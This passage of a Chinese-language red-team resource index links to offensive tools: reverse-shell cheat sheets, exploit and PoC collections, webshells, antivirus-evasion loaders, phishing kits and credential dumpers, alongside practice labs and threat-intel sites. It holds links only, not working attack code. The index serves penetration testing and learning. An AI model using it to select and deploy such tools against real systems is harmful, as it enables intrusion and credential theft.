Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/%E5%B8%B8%E8%A7%81WAF%E6%8B%A6%E6%88%AA%E9%A1%B5%E9%9D%A2%E9%80%9F%E6%9F%A5.md) - 反弹shell命令速查:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/%E5%8F%8D%E5%BC%B9shell%E5%91%BD%E4%BB%A4%E9%80%9F%E6%9F%A5.md) - 默认口令/弱口令速查:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/) - 重要端口及服务速查:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/%E9%87%8D%E8%A6%81%E7%AB%AF%E5%8F%A3%E5%8F%8A%E6%9C%8D%E5%8A%A1%E9%80%9F%E6%9F%A5.md) - HTTP状态码速查:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/HTTP%E7%8A%B6%E6%80%81%E7%A0%81%E9%80%9F%E6%9F%A5.md) - 安全厂商及官网链接速查:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/%E5%AE%89%E5%85%A8%E5%8E%82%E5%95%86%E5%8F%8A%E5%AE%98%E7%BD%91%E9%93%BE%E6%8E%A5%E9%80%9F%E6%9F%A5.txt) - Apache项目及漏洞指纹速查:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/Apache%E9%A1%B9%E7%9B%AE%E5%8F%8A%E6%BC%8F%E6%B4%9E%E6%8C%87%E7%BA%B9%E9%80%9F%E6%9F%A5.md) - OWASP TOP10 2017/2021:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/OWASP%20TOP10.md) ### 一些代码-Scripts - ShellcodeWrapper:[Click Here](https://github.com/Threekiii/Awesome-Redteam/tree/master/scripts/ShellcodeWrapper) - AntivirusScanner:杀软进程检测脚本 [Click Here](https://github.com/Threekiii/Awesome-Redteam/tree/master/scripts/AntivirusScanner) - runtime-exec-payloads.html:java.lang.Runtime.exec() Payloads生成 [Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/scripts/runtime-exec-payloads.html) - Ascii2Char:ASCII码和字符互相转换脚本 修改webshell文件名密码 [Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/scripts/Ascii2Char.py) - Weakpass_Generator:在线弱密码生成工具 汉化版 [Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/scripts/Weakpass_Generator) ### 攻防知识-Tips - 内网渗透-免杀:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/tips/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-%E5%85%8D%E6%9D%80.md) - 内网渗透-隐藏:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/tips/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-%E9%9A%90%E8%97%8F.md) - 红队中易被攻击的一些重点系统漏洞整理(来源:棱角安全团队):[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/tips/%E7%BA%A2%E9%98%9F%E4%B8%AD%E6%98%93%E8%A2%AB%E6%94%BB%E5%87%BB%E7%9A%84%E4%B8%80%E4%BA%9B%E9%87%8D%E7%82%B9%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86.md) - 网络攻击与防御图谱:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/tips/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E4%B8%8E%E9%98%B2%E5%BE%A1%E5%9B%BE%E8%B0%B1.svg) - Webshell流量分析:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/tips/Webshell%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90.md) ### 服务搭建-Docs - DNS log平台搭建:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/docs/DNS%20log%E5%B9%B3%E5%8F%B0%E6%90%AD%E5%BB%BA.md) ## 开源导航 ### 编解码/加解密综合 - CyberChef:编解码及加密,可本地部署 https://github.com/gchq/CyberChef - OK Tools在线工具:https://github.com/wangyiwy/oktools - CTF在线工具:http://www.hiencode.com/ - XSSEE:在线综合编解码工具 https://evilcos.me/lab/xssee/ - MeTools:在线综合编解码工具 http://www.metools.info/code/quotedprintable231.html ### 常见编解码/加解密 - MD5 Hash:https://www.somd5.com/ - CMD5:https://www.cmd5.com/ - GB2312:http://code.mcdvisa.com/ - Unicode字符表:https://www.52unicode.com/enclosed-alphanumerics-zifu - Unicode:https://www.compart.com/en/unicode/ - UUencode:http://web.chacuo.net/charsetuuencode - Escape/Unescape:https://tool.chinaz.com/tools/escape.aspx - HTML实体编码:https://zh.rakko.tools/tools/21/ ### 实用工具 - Explain Shell:Shell命令解析 https://explainshell.com/ - 反弹Shell生成: - 本地部署项目 https://github.com/0dayCTF/reverse-shell-generator - 棱角安全在线 https://forum.ywhack.com/reverse-shell/ - 文件下载命令: - 本地部署项目 https://github.com/r0eXpeR/File-Download-Generator - 棱角安全在线 https://forum.ywhack.com/bountytips.php?tools - 在线正则表达式:https://c.runoob.com/front-end/854/ - Webshell Chop:https://webshellchop.chaitin.cn/demo/ - XSS Chop:https://xsschop.chaitin.cn/demo/ - WebShell查杀:https://n.shellpub.com/ - HTML5 Security Cheatsheet:XSS攻击向量学习/参考 https://html5sec.org/ - 在线代码格式标准化:http://web.chacuo.net/formatsh - 免费接受手机验证码:https://www.supercloudsms.com/en/ ### 威胁情报 - Virustotal:https://www.virustotal.com/gui/home/upload - 腾讯哈勃分析系统:https://habo.qq.com/tool/index - 微步在线威胁情报:https://x.threatbook.cn/ - 奇安信威胁情报:https://ti.qianxin.com/ - 360威胁情报:https://ti.360.net/#/homepage - 安恒威胁情报:https://ti.dbappsecurity.com.cn/ - 火线安全平台:https://www.huoxian.cn - 知道创宇漏洞平台:https://www.seebug.org/ - 知道创宇黑客新闻流:https://hackernews.cc/ - Hacking8安全信息流:https://i.hacking8.com/ - SecWiki安全信息流:https://www.sec-wiki.com/ - 网络安全威胁信息共享平台:https://share.anva.org.cn/web/publicity/listPhishing - 国家互联网应急中心:https://www.cert.org.cn/ ### 网络空间搜索 - Fofa:https://fofa.info/ - Shodan:https://www.shodan.io/ - ZoomEye:https://www.zoomeye.org/ - 鹰图:https://hunter.qianxin.com/ - 谛听:https://www.ditecting.com/ - 360网络空间测绘:https://quake.360.cn/quake/#/index - Google Hacking Database:https://www.exploit-db.com/google-hacking-database ### 公开知识库 - 棱角社区工具集整理:https://forum.ywhack.com/bountytips.php?tools - ffffffff0x 团队安全知识框架:https://github.com/ffffffff0x/1earn - 先知社区:https://xz.aliyun.com/ - 狼组公开知识库:https://wiki.wgpsec.org/ - 零组文库:零组已停运,非官方 https://0-wiki.com/ - 404星链计划:知道创宇 404 实验室 https://github.com/knownsec/404StarLink - MITRE ATT&CK:网络攻击中使用的已知对抗战术和技术 https://attack.mitre.org/matrices/enterprise ### 其他 - Wayback Machine:网页历史缓存 https://archive.org/web ## 信息收集 ### IP/域名 #### 确认真实IP地址 - IP精准定位:https://www.ipuu.net/#/home - IP 138:https://site.ip138.com/ - Security Trails:https://securitytrails.com/ #### 多个地点Ping服务器 - Chinaz:https://ping.chinaz.com/ - Host Tracker:https://www.host-tracker.com/ - Webpage Test:https://www.webpagetest.org/ - DNS Check:https://dnscheck.pingdom.com/ #### IP反查域名 - IP138 https://site.ip138.com/ - 微步在线 https://x.threatbook.cn/ - VirusTotal [https://www.virustotal.com/](https://www.virustotal.com/gui/home/upload) #### Whois注册信息反查 - 站长之家 Whois:https://whois.chinaz.com/ - 中国万网 Whois:https://whois.aliyun.com/ - 国际 Whois:https://who.is/ #### DNS数据聚合查询 - Hacker Target:https://hackertarget.com/find-dns-host-records - DNS Dumpster:https://dnsdumpster.com - DNS DB:https://dnsdb.io/zh-cn #### TLS证书信息查询 - Censys:https://censys.io - Certificate Search:https://crt.sh - 证书透明度监控:https://developers.facebook.com/tools/ct #### IP地址段收集 - CNNIC中国互联网信息中心:http://ipwhois.cnnic.net.cn ### 指纹识别 - Wapplyzer:Chrome插件 跨平台网站分析工具 https://github.com/AliasIO/Wappalyzer - Finger:一款红队在大量的资产中存活探测与重点攻击系统指纹探测工具 https://github.com/EASY233/Finger - EHole:红队重点攻击系统指纹探测工具 https://github.com/EdgeSecurityTeam/EHole - ObserverWard:web 指纹识别 https://github.com/0x727/ObserverWard - TideFinger:提取了多个开源指纹识别工具的规则库并进行了规则重组 https://github.com/TideSec/TideFinger - fingerprint:各种工具指纹收集分享 https://github.com/r0eXpeR/fingerprint - Dismap:tcp/udp/tls 协议指纹和 4500+ Web 指纹规则 https://github.com/zhzyker/dismap - 御剑web指纹识别程序:https://www.webshell.cc/4697.html - 云悉指纹识别:http://www.yunsee.cn/ - identYwaf:WAF识别工具 https://github.com/stamparm/identYwaf ### 扫描/爆破 #### 扫描/爆破工具 - jwt_tool:JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool - c-jwt-cracker:JSON Web Token Cracker https://github.com/brendan-rius/c-jwt-cracker - dirsearch:目录扫描/爆破 https://github.com/maurosoria/dirsearch - dirmap:目录扫描/爆破 https://github.com/H4ckForJob/dirmap - ffuf:高速web fuzz工具 https://github.com/ffuf/ffuf - Arjun:HTTP参数扫描器 https://github.com/s0md3v/Arjun - URLFinder:JS与URL快速提取检测 https://github.com/pingc0y/URLFinder - ksubdomain:子域名爆破 https://github.com/knownsec/ksubdomain - Gobuster:URI/DNS/WEB爆破 https://github.com/OJ/gobuster - Hydra:弱密码爆破 https://github.com/vanhauser-thc/thc-hydra - John the Ripper:https://github.com/openwall/john - 403bypasser:403 绕过 https://github.com/yunemse48/403bypasser - byp4xx:403 绕过 https://github.com/lobuhi/byp4xx #### 扫描/爆破字典 - SecLists:46.4k star 项目 https://github.com/danielmiessler/SecLists - Dictionary-Of-Pentesting:渗透测试、SRC漏洞挖掘、爆破、Fuzzing等常用字典 https://github.com/insightglacier/Dictionary-Of-Pentesting - fuzzDicts:Web渗透Fuzz字典 https://github.com/TheKingOfDuck/fuzzDicts - Web-Fuzzing-Box:Web 模糊测试字典与Payloads https://github.com/gh0stkey/Web-Fuzzing-Box - PentesterSpecialDict:渗透测试工程师精简化字典 https://github.com/ppbibo/PentesterSpecialDict - fuzz:https://github.com/Bo0oM/fuzz.txt - top25-parameter:top25参数字典 https://github.com/lutfumertceylan/top25-parameter #### 字典生成 - 在线弱密码生成:https://weakpass.com/generate - 在线子域名生成:https://weakpass.com/generate/domains - Weakpass:在线弱密码生成工具部署 https://github.com/zzzteph/weakpass - Weakpass:在线子域名生成工具部署 https://github.com/zzzteph/probable_subdomains - pydictor:一个强大实用的黑客暴力破解字典建立工具 https://github.com/LandGrey/pydictor/ - 汉字转拼音:https://www.aies.cn/pinyin.htm #### 默认口令查询 - Default Credentials Cheat Sheet:3468个默认密码 https://github.com/ihebski/DefaultCreds-cheat-sheet - datarecovery:在线默认口令查询 https://datarecovery.com/rd/default-passwords/ - cirt.net:在线默认口令查询 https://cirt.net/passwords - 在线路由器密码查询: - https://www.routerpasswords.com/ - https://portforward.com/router-password/ - https://www.cleancss.com/router-default/ - https://www.toolmao.com/baiduapp/routerpwd/ - https://datarecovery.com/rd/default-passwords/ ### 社会工程学 - Hunter:Chrome插件 查找网页暴露邮箱 https://hunter.io/chrome - Phonebook:邮箱地址搜索 https://phonebook.cz - Skymem:邮箱地址搜索 https://www.skymem.info/ - 搜邮箱:邮箱域名搜索 https://souyouxiang.com/find-contact/ - gophish:钓鱼邮件 https://github.com/gophish/gophish - SpoofWeb:一键部署HTTPS钓鱼网站 https://github.com/5icorgi/SpoofWeb ### 公众号/小程序 - 小蓝本:https://www.xiaolanben.com/ ### 浏览器 - HackBrowserData:浏览器数据导出工具 https://github.com/moonD4rk/HackBrowserData ### 综合工具 - AlliN:https://github.com/P1-Team/AlliN - Kunyu:https://github.com/knownsec/Kunyu - OneForAll:https://github.com/shmilylty/OneForAll - ShuiZe:https://github.com/0x727/ShuiZe_0x727 - FofaX:https://github.com/xiecat/fofax - Fofa Viewer:https://github.com/wgpsec/fofa_viewer - Fofa GUI:https://github.com/bewhale/FOFA_GUI - fscan:内网综合扫描工具 https://github.com/shadow1ng/fscan - hping3:端口扫描 高速 发包量少 结果准确无蜜罐 https://github.com/antirez/hping - ENScan_GO:国内企业信息收集 https://github.com/wgpsec/ENScan_GO - Ladon:用于大型网络渗透的多线程插件化综合扫描工具 https://github.com/k8gege/Ladon ## 漏洞研究 ### 开源资源 - HackerOne:https://www.hackerone.com/ - cve:收录了几乎所有公开的CVE https://github.com/trickest/cve - Vulhub:基于Docker的漏洞复现环境 https://vulhub.org/ - PeiQi:面向网络安全从业者的知识文库 http://wiki.peiqi.tech/ - Vulnerability:棱角社区公布漏洞 https://github.com/EdgeSecurityTeam/Vulnerability - 乌云镜像:http://wooyun.2xss.cc/ - 未授权访问漏洞总结:http://luckyzmj.cn/posts/15dff4d3.html ### 靶机平台 - DVWA:https://github.com/digininja/DVWA - HackTheBox:https://www.hackthebox.com/ - OWASP Top10:https://owasp.org/www-project-juice-shop/ - WebGoat:https://github.com/WebGoat/WebGoat - Sqli-labs:SQL注入 https://github.com/Audi-1/sqli-labs - Xss-labs:XSS注入 https://github.com/do0dl3/xss-labs - Upload-labs:上传漏洞 https://github.com/c0ny1/upload-labs - Vulstudy:docker快速搭建共17个漏洞靶场 https://github.com/c0ny1/vulstudy - Vulfocus:漏洞集成平台 https://github.com/fofapro/vulfocus ## 漏洞扫描 ### POC库 > Be careful Malware,POC 库最新的 CVE 可能存在投毒风险。 - Exploit Database:https://www.exploit-db.com/ - POChouse:https://github.com/DawnFlame/POChouse - Some-PoC-oR-ExP:各种漏洞PoC、ExP的收集或编写 https://github.com/coffeehb/Some-PoC-oR-ExP - Library-POC:基于Pocsuite3、goby编写的漏洞poc&exp存档 https://github.com/luck-ying/Library-POC - Penetration_Testing_POC:https://github.com/Mr-xn/Penetration_Testing_POC - PoC-in-GitHub:https://github.com/nomi-sec/PoC-in-GitHub - 0day:https://github.com/helloexp/0day ### POC编写 - POC 辅助生成:在线 https://poc.xray.cool/ - POC 辅助生成:本地 https://github.com/zeoxisca/gamma-gui ### 综合工具 - xpoc:供应链漏洞扫描 https://github.com/chaitin/xpoc - Xray:安全评估工具 https://github.com/chaitin/xray - Super Xray:Xray GUI启动器 https://github.com/4ra1n/super-xray - Vulmap:漏洞扫描和验证工具 https://github.com/zhzyker/vulmap - Artillery:插件化 JAVA 漏洞扫描器 https://github.com/Weik1/Artillery - Aazhen-v3.1:JavaFX图形化漏洞扫描工具 https://github.com/zangcc/Aazhen-v3.1 ## 漏洞利用 ### 辅助工具 - ysoserial:Java反序列化 https://github.com/frohoff/ysoserial - Ceye DNS:在线平台 Dnslog http://ceye.io/ - Dnslog:在线平台 Dnslog http://dnslog.cn/ - Fuzz.Red:在线平台 Dnslog https://github.com/AlphabugX/Alphalog - DNS重绑定:https://lock.cmpxchg8b.com/rebinder.html - DNSLog-GO:自建私有平台 https://github.com/lanyi1998/DNSlog-GO - JNDI-Injection-Exploit:https://github.com/welk1n/JNDI-Injection-Exploit - JNDIExploit:功能更强 冰蝎内存马 https://github.com/WhiteHSBG/JNDIExploit - wscat:Websocket测试工具 https://github.com/websockets/wscat ### 数据库 - RedisStudio:Redis 未授权 https://github.com/cinience/RedisStudio - mysql-fake-server:MySQL JDBC 客户端 Java 反序列化漏洞利用 https://github.com/4ra1n/mysql-fake-server ### 信息泄露 - GitHack:.git泄露利用脚本 https://github.com/lijiejie/GitHack python3 有时无法恢复.git目录,推荐python2版本 - GitHack:.git泄露利用脚本https://github.com/BugScanTeam/GitHack python2 - dvcs-ripper:.svn、.hg、.cvs泄露利用脚本 https://github.com/kost/dvcs-ripper - ds_store_exp:.DS_Store 文件泄漏利用脚本 https://github.com/lijiejie/ds_store_exp - Hawkeye:GitHub 泄露监控系统 https://github.com/0xbug/Hawkeye ### 操作系统 - Windows-Exploit-Suggester:https://github.com/AonCyberLabs/Windows-Exploit-Suggester - Linux_Exploit_Suggester:https://github.com/The-Z-Labs/linux-exploit-suggester - Linux_Exploit_Suggester:https://github.com/InteliSecureLabs/Linux_Exploit_Suggester - windows-kernel-exploits:提权漏洞集合 https://github.com/SecWiki/windows-kernel-exploits - Windows Elevation:https://github.com/Al1ex/WindowsElevation ### Druid - DruidCrack:Druid密文解密工具 https://github.com/rabbitmask/DruidCrack - druid_sessions:Druid sessions利用工具 https://github.com/yuyan-sec/druid_sessions ### Etcd - etcd:etcdctl https://github.com/etcd-io/etcd ### Nacos - https://github.com/c0olw/NacosRce/ ### Java - jdwp-shellifier:python2 https://github.com/IOActive/jdwp-shellifier - jdwp-shellifier:https://github.com/Lz1y/jdwp-shellifier - attackRmi:https://github.com/A-D-Team/attackRmi ### Redis - redis-rogue-server:Redis未授权访问 https://github.com/n0b0dyCN/redis-rogue-server - redis-rce:Redis未授权访问 https://github.com/Ridter/redis-rce ### Shiro - shiro_attack:https://github.com/j1anFen/shiro_attack - shiro_rce_tool:https://github.com/wyzxxz/shiro_rce_tool - ShiroExploit:https://github.com/feihong-cs/ShiroExploit-Deprecated - ShiroExp:https://github.com/safe6Sec/ShiroExp - shiro_key:shiro key 收集 目前 1k+ https://github.com/yanm1e/shiro_key ### Struts - Struts2VulsTools:https://github.com/shack2/Struts2VulsTools ### Spring - SpringBoot-Scan:https://github.com/AabyssZG/SpringBoot-Scan - Spring_All_Reachable:Spring Cloud Gateway命令执行 CVE-2022-22947、Spring Cloud Function SpEL 远程代码执行 CVE-2022-22963 https://github.com/savior-only/Spring_All_Reachable - SpringBootVulExploit:https://github.com/LandGrey/SpringBootVulExploit - Spring-cloud-function-SpEL-RCE:CVE-2022-22963 https://github.com/mamba-2021/EXP-POC/tree/main/Spring-cloud-function-SpEL-RCE - swagger-exp:Swagger REST API 信息泄露利用工具 https://github.com/lijiejie/swagger-exp - heapdump_tool:heapdump敏感信息查询工具 https://github.com/wyzxxz/heapdump_tool - JDumpSpider:HeapDump敏感信息提取工具 https://github.com/whwlsfb/JDumpSpider - Memory Analyzer:HeapDump分析工具 https://www.eclipse.org/mat/previousReleases.php ### Tomcat - CVE-2020-1938:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi - ClassHound:https://github.com/LandGrey/ClassHound ### Thinkphp - ThinkphpGUI:https://github.com/Lotus6/ThinkphpGUI - thinkphp_gui_tools:https://github.com/bewhale/thinkphp_gui_tools ### Weblogic - WeblogicTool:https://github.com/KimJun1010/WeblogicTool - WeblogicScan:https://github.com/dr0op/WeblogicScan - weblogicScanner:https://github.com/0xn0ne/weblogicScanner - weblogic-framework:https://github.com/sv3nbeast/weblogic-framework ### Vcenter - VcenterKiller:针对Vcenter的综合利用工具 https://github.com/Schira4396/VcenterKiller ### Zookeeper - ZooInspector:ZooKeeper 客户端监控软件 https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip - apache-zookeeper:zkCli.sh 客户端命令连接 https://archive.apache.org/dist/zookeeper/zookeeper-3.5.6/ ### CMS / OA - CMS-Hunter:CMS漏洞测试用例集合 https://github.com/SecWiki/CMS-Hunter - 若依CMS https://github.com/thelostworldFree/Ruoyi-All - MYExploit:https://github.com/achuna33/MYExploit ### Payload / Bypass - PayloadsAllTheThings:https://github.com/swisskyrepo/PayloadsAllTheThings - java.lang.Runtime.exec() Payload:java Payload在线生成 https://www.bugku.net/runtime-exec-payloads/ - PHP Generic Gadget Chains:PHP反序列化Payload https://github.com/ambionics/phpggc - PHPFuck:https://github.com/splitline/PHPFuck - JSFuck:http://www.jsfuck.com/ - Gopherus:SSRF 生成gopher链接 https://github.com/tarunkant/Gopherus python2 - CVE-2021-44228-PoC-log4j-bypass-words:https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words ## 内网渗透 ### 内网探测 - netspy:快速探测内网可达网段 https://github.com/shmilylty/netspy ### 权限维持 - Webshell收集项目:https://github.com/tennc/webshell - TomcatMemShell:Tomcat内存马 https://github.com/ce-automne/TomcatMemShell - wsMemShell:WebSocket 内存马 https://github.com/veo/wsMemShell - RMI_Inj_MemShell:LDAP无效时的RMI内存马 配合wscat使用 https://github.com/novysodope/RMI_Inj_MemShell - Behinder 冰蝎:https://github.com/rebeyond/Behinder - Behinder4已经发布 - Behinder3:`kali + java 11.0.14` 或 `windows10 + java 1.8.0_91`,注意,该环境下Behinder2无法正常运行,Behinder3代理经测试php无法成功穿透,jsp可以成功穿透 - Behinder2:windows10 + java 1.8.0_91 - Godzilla 哥斯拉:https://github.com/BeichenDream/Godzilla - Skyscorpion:https://github.com/shack2/skyscorpion ### 免杀项目 - bypassAV:免杀shellcode加载器 过火绒不过360 https://github.com/pureqh/bypassAV - GolangBypassAV:https://github.com/safe6Sec/GolangBypassAV - BypassAntiVirus:远控免杀系列文章及配套工具 https://github.com/TideSec/BypassAntiVirus - BypassAntiVirus2022年部分免杀复现:[Threekiii/Awesome-Redteam](https://github.com/Threekiii/Awesome-Redteam/blob/master/tips/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-%E5%85%8D%E6%9D%80.md) - AV_Evasion_Tool:掩日 - 适用于红队的综合免杀工具 https://github.com/1y0n/AV_Evasion_Tool - shellcodeloader:Windows平台的shellcode免杀加载器 https://github.com/knownsec/shellcodeloader - 杀软比对:https://www.shentoushi.top/av/av.php - 在线免杀:免杀方式为原生webshell随机字符修改、Java反射、垃圾字符填充、函数名称变形 http://bypass.tidesec.com/web/ ### 内网穿透 - NPS:通过web端管理,无需配置文件 https://github.com/ehang-io/nps - FRP:55k star项目 https://github.com/fatedier/frp - Neo-reGeorg:tunnel快速部署 https://github.com/L-codes/Neo-reGeorg - Viper:图形化内网渗透 https://github.com/FunnyWolf/Viper - Stowaway:多级代理 https://github.com/ph4ntonn/Stowaway - Proxifier:windows代理工具 https://www.proxifier.com/ - Proxychains:kali代理工具 https://github.com/haad/proxychains - iodine:dns隧道 https://github.com/yarrick/iodine - dnscat2:dns隧道 https://github.com/iagox86/dnscat2 - icmpsh:icmp隧道 https://github.com/bdamele/icmpsh ### 密码提取 - 密码猜解:猜测目标可能使用的密码 https://www.hacked.com.cn/pass.html - Responder:实现获取NTLM Hash等功能 https://github.com/SpiderLabs/Responder - HackBrowserData:浏览器数据导出工具 https://github.com/moonD4rk/HackBrowserData - Sunflower_get_Password:针对向日葵的识别码和验证码提取工具 https://github.com/wafinfo/Sunflower_get_Password ### 其他 - Impacket:其中的psexec.py通过用户名和密码远程连接到目标服务器 https://github.com/SecureAuthCorp/impacket - PsTools:PsExec.exe功能同Impacket中的psexec.py https://docs.microsoft.com/en-us/sysinternals/downloads/pstools ## 逆向分析 ### 靶机平台 - IoT-vulhub: IoT 版固件漏洞复现环境 https://github.com/firmianay/IoT-vulhub ### 综合工具 - OpenArk:Anti-Rootkit(对抗恶意程序)工具集 https://github.com/BlackINT3/OpenArk - 逆向分析工具集:https://pythonarsenal.com/ - PEiD:查壳工具 https://www.aldeid.com/wiki/PEiD - Py2exe:Python打包工具 https://www.py2exe.org/ - PyInstaller:Python打包工具 https://github.com/pyinstaller/pyinstaller - AppInfoScanner:移动端信息收集 https://github.com/kelvinBen/AppInfoScanner ### 小程序 - wxappUnpacker:小程序解包 https://github.com/xuedingmiaojun/wxappUnpacker - CrackMinApp:反编译微信小程序 https://github.com/Cherrison/CrackMinApp ### APK - Apktool:Android apk逆向 https://github.com/iBotPeaches/Apktool ## 云安全 ### 云安全资源 - TeamsSix 云安全资源:https://github.com/teamssix/awesome-cloud-security - 云安全知识文库:https://wiki.teamssix.com/ - 阿里云OpenAPI:https://next.api.aliyun.com/api/ - 云原生全景图:https://landscape.cncf.io/ - 云服务漏洞库:https://www.cloudvulndb.org/ ### 云安全矩阵 - ATT&CK Cloud Matrix:https://attack.mitre.org/matrices/enterprise/cloud/ - 火线安全-云服务攻防矩阵 https://cloudsec.huoxian.cn/ - 腾讯云鼎实验室-云安全攻防矩阵 https://cloudsec.tencent.com/home/ ### 云上靶场 - Metarget:https://github.com/Metarget/metarget - Attack Defense:付费 https://attackdefense.pentesteracademy.com/listing?labtype=cloud-services&subtype=cloud-services-amazon-s3 - AWSGoat:https://github.com/ine-labs/AWSGoat - TerraformGoat:火线云环境攻防靶场 https://github.com/HuoCorp/TerraformGoat - Kubernetes Goat:https://github.com/madhuakula/kubernetes-goat - CloudGoat:https://github.com/RhinoSecurityLabs/cloudgoat ### AK/SK - CF:云环境利用框架 https://github.com/teamssix/cf - aksk_tool:https://github.com/wyzxxz/aksk_tool - aliyun-accesskey-Tools:阿里云图形化利用工具 https://github.com/mrknow001/aliyun-accesskey-Tools - alicloud-tools:阿里云利用工具https://github.com/iiiusky/alicloud-tools - oss-browser:阿里云OSS客户端 https://github.com/aliyun/oss-browser - cosbrowser:腾讯云COS客户端 https://github.com/TencentCloud/cosbrowser - 行云管家:云存储图形化管理平台 https://yun.cloudbility.com/ - kodo-browser:七牛对象存储图形化管理工具 https://github.com/qiniu/kodo-browser ## 开源蜜罐 - HFish:一款安全、简单可信赖的跨平台蜜罐软件,允许商业和个人用户免费使用 https://github.com/hacklcx/HFish ## 容器安全 - CDK:容器渗透 https://github.com/cdk-team/CDK - veinmind-tools:容器安全工具集 https://github.com/chaitin/veinmind-tools - Awesome Container Escape:容器逃逸 https://github.com/brant-ruan/awesome-container-escape ## 必备工具 ### 命令行 - oh my zsh:命令行工具集 https://github.com/ohmyzsh/ohmyzsh - Platypus:反弹shell管理 https://github.com/WangYihang/Platypus - tabby:高度可配置终端 https://github.com/Eugeny/tabby - anew:命令行工具 文件合并去重 https://github.com/tomnomnom/anew - The art of command line:快速掌握命令行 https://github.com/jlevy/the-art-of-command-line ### Metasploit - Metasploit:https://github.com/rapid7/metasploit-framework ### Yakit - Yakit:网络安全单兵工具 对标Burpsuite https://github.com/yaklang/yakit ### Cobaltstrike Extensions - Awesome CobaltStrike:CobaltStrike知识库 https://github.com/zer0yu/Awesome-CobaltStrike - Erebus:后渗透测试插件 https://github.com/DeEpinGh0st/Erebus - LSTAR:综合后渗透插件 https://github.com/lintstar/LSTAR - ElevateKit:提权插件 https://github.com/rsmudge/ElevateKit ### Burpsuite Extensions - HaE:高亮标记与信息提取辅助型插件 https://github.com/gh0stkey/HaE - Log4j2Scan:Log4j主动扫描插件 https://github.com/whwlsfb/Log4j2Scan - RouteVulScan:检测脆弱路径插件 https://github.com/F6JO/RouteVulScan ### Chrome Extensions - Proxy SwitchyOmega:快速切换代理 https://github.com/FelisCatus/SwitchyOmega - serp-analyzer:识别域名/IP信息 https://leadscloud.github.io/serp-analyzer/ - FindSomething:在网页的源代码或js中寻找有用信息 https://github.com/ResidualLaugh/FindSomething - Hack Bar:渗透神器No.1 https://github.com/0140454/hackbar - Wappalyzer:识别网站技术/框架/语言 https://www.wappalyzer.com/ - EditThisCookie:修改Cookie https://www.editthiscookie.com/ - Disable JavaScript:禁用JavaScript绕过弹窗 https://github.com/dpacassi/disable-javascript - Heimdallr:被动监听的谷歌插件,用于高危指纹识别、蜜罐特征告警和拦截、机器特征对抗 https://github.com/graynjo/Heimdallr - immersive-translate:翻译插件 https://github.com/immersive-translate/immersive-translate/ - json-formatter:Json格式化插件 https://github.com/callumlocke/json-formatter ## 其他优秀项目 - PySimpleGUI:https://github.com/PySimpleGUI/PySimpleGUI - f8x:红/蓝队环境自动化部署工具 https://github.com/ffffffff0x/f8x - cloudreve:私有云盘部署 https://github.com/cloudreve/Cloudreve ## 先mark待测试项目 - tabby:https://github.com/wh1t3p1g/tabby - changeme:https://github.com/ztgrace/changeme - RouterSploit:https://github.com/threat9/routersploit - Adinfo:域内信息收集 https://github.com/lzzbb/Adinfo - JNDInjector:高度可定制化的JNDI和Java反序列化利用工具 https://github.com/rebeyond/JNDInjector - IDOR_detect_tool:SaaS-API越权漏洞检测系统 https://github.com/y1nglamore/IDOR_detect_tool - AsamF:集成多个网络资产测绘平台的一站式企业信息资产收集工具 https://github.com/Kento-Sec/AsamF - FastjsonScan:Fastjson扫描器,可识别版本、依赖库、autoType状态等 https://github.com/a1phaboy/FastjsonScan - OA-EXPTOOL:OA综合利用工具 https://github.com/LittleBear4/OA-EXPTOOL - SharpHostInfo:快速探测内网主机信息工具 https://github.com/shmilylty/SharpHostInfo - ThunderSearch:支持Fofa、Zoomeye、360Quake的GUI界面的信息搜集工具 https://github.com/xzajyjs/ThunderSearch ## 使用姿势 ### 如何在Windows上使用alias - 创建alias.bat,文件内容如下。 ``` @echo off ::Tips @DOSKEY httpcode=type "D:\Hack Tools\Tips\http_status_code.md" @DOSKEY versions=type "D:\Hack Tools\Tips\versions.md" @DOSKEY owasp=type "D:\Hack Tools\Tips\owasp.md" ``` - 注册表打开`计算机\HKEY_CURRENT_USER\Software\Microsoft\Command Processor`。 - 创建字符串值`autorun`,赋值为alias.bat所在位置,例如`D:\Software\alias.bat`。 - 双击alias.bat运行,重启cmd。 - 此时在终端输入httpcode,即可返回文件内容。 ![image-20220208090022459](./images/202205131147745.png) > 解决cmd中文乱码的问题: > > 1. 注册表打开`计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor`。 > 2. 创建字符串值`autorun`,赋值为`chcp 65001`。 ### 如何通过.bat运行conda环境下python文件 run.bat ``` call D:\YOUR_PATH\Anaconda\Scripts\activate.bat D:\YOUR_PATH\Anaconda\ call conda activate YOUR_ENV cd D:\YOUR_WORKDIR python YOUR_PYTHON_FILE.py pause ``` ### 如何使用浏览器快速查看markdown文档 - 安装插件`Markdown Viewer`。 - 配合Bootstrap可以实现快速部署导航页或文档库。 